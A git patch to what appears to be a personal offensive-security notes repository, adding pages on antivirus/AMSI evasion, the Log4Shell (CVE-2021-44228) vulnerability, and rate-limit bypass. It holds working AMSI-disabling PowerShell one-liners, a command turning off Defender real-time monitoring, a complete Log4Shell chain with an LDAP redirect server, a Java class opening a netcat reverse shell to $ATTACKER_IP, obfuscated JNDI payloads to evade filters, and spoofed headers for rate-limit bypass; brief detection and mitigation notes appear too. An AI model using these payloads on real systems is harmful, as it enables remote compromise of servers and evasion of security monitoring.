From fe64f65d51b11719e142c28479bf6dcffa7c59ea Mon Sep 17 00:00:00 2001 From: whx Date: Mon, 13 Dec 2021 23:48:07 +0100 Subject: [PATCH] log4j --- antivirus_evasion.md | 58 +++++++++++++++++++- exploit/java/log4shell.md | 85 +++++++++++++++++++++++++++++ exploit/web/bypass_rate_limiting.md | 18 ++++++ 3 files changed, 159 insertions(+), 2 deletions(-) create mode 100644 exploit/java/log4shell.md create mode 100644 exploit/web/bypass_rate_limiting.md diff --git a/antivirus_evasion.md b/antivirus_evasion.md index 233ca87..4bf3cd1 100644 --- a/antivirus_evasion.md +++ b/antivirus_evasion.md @@ -26,17 +26,71 @@ AMSI_RESULT_DETECTED = 32768 * [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) * PowerShell downgrade * [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git) - +* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py) +* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) * Practical example ```sh [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse Set-MpPreference -DisableRealtimeMonitoring $true ``` +* Varying string concatenation and camelCasing variations of the following string +```sh +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +``` ### Validate -* Validate Obfuscation +* Validate Obfuscation and check which strings trigger AMSI * [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger) +```sh +.\\AMSITrigger.exe -u -f 1 +``` +or +```sh +.\\AMSITrigger.exe -i -f 1 +``` + +### Further Obfuscation + +* String concatenation +```sh +$OBF = 'Ob' + 'fu' + 's' +'cation' +``` +* `Concatenate - ('co'+'ffe'+'e')` +* `Reorder - ('{1}{0}'-f'ffee','co')` +* `Whitespace - ( 'co' +'fee' + 'e')` + +#### Type Obfuscation +* .NET has type accelerators as aliases for types to shorten them and break the signature. +* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell) +* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html) +* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1) + +* Example + * Without +```sh +[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); +``` + * With +```sh +[dorkstork]::copy($buf, 0, $BufferAddress, 6); +``` + +### Automated Obfuscation + +#### Powershell +* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) +* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide) +```sh +Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit +``` +* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded. + +#### Other Obfuscation +* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck) + * Has to be build via VS. Will output a ddll, an excutable and an XML file. + * `ThreatCheck.exe -f ` +* [DefenderCheck](https://github.com/matterpreter/DefenderCheck) ## Links * [cmnatic](https://cmnatic.co.uk/) diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md new file mode 100644 index 0000000..1efe6ad --- /dev/null +++ b/exploit/java/log4shell.md @@ -0,0 +1,85 @@ +# Log4Shell + +* `log4j` < version 2.15.0rc2 +* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java) +* [log4j vulnerability tester](https://log4shell.huntress.com/) +* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface) + +* Code inside a `param` value is parsed and a `${payload}` will be executed, for example +```sh +${sys:os.name} +${sys:user.name} +${log4j:configParentLocation} +${ENV:PATH} +${ENV:HOSTNAME} +${java:version} +``` +## Java Naming and Directory Interface JNDI + +* Vulnerability can be exploited via `${jndi:ldap:///foo}` + +## POC +```sh +curl 'http://:8983/solr/admin/cores?foo=?$\{jndi:ldap://:4449\}' +``` + +## Usage + +* Fuzz endpoints to applicate the exploit +* Use HTTP header field as storage for payload as well as any other possible input field +```HTTP +X-Forwarded-For: ${jndi:ldap://:1389/foo} +``` + +* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests` +* Java version should be the same as the one on the target +* Redirect LDAP server to HTTP server +```sh +java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" +``` + +* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class +```sh +public class Exploit { + static { + try { + java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449"); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` +* Open reverse shell on `4449` +* `curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'` + + +## Detection + +* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git) +* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228) +* [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/) +* [Yara rules](https://github.com/darkarnium/CVE-2021-44228) + +* Parse logs for `jndi` + +## Bypasses + +* Possible bypasses are as follows +```sh +${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} +${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/} +${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/} +${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z} +${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/} +${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/} +${${::-j}ndi:rmi://attackerendpoint.com/} +``` + +## Mitgation + +* [Apache Solr security news](https://solr.apache.org/security.html) +* Add the following line to `solr.in.sh` +```toml +SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" +``` diff --git a/exploit/web/bypass_rate_limiting.md b/exploit/web/bypass_rate_limiting.md new file mode 100644 index 0000000..a4e5ea2 --- /dev/null +++ b/exploit/web/bypass_rate_limiting.md @@ -0,0 +1,18 @@ +# Bypassing Rate Limit + +* [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c) +* [Anotherinfosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17) +* [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass) + +# Usage + +* Add one of the following lines to the header in round robin +```sh +X-Originating-IP: 127.0.0.1 +X-Forwarded-For: 127.0.0.1 +X-Remote-IP: 127.0.0.1 +X-Remote-Addr: 127.0.0.1 +X-Client-IP: 127.0.0.1 +X-Host: 127.0.0.1 +X-Forwared-Host: 127.0.0.1 +```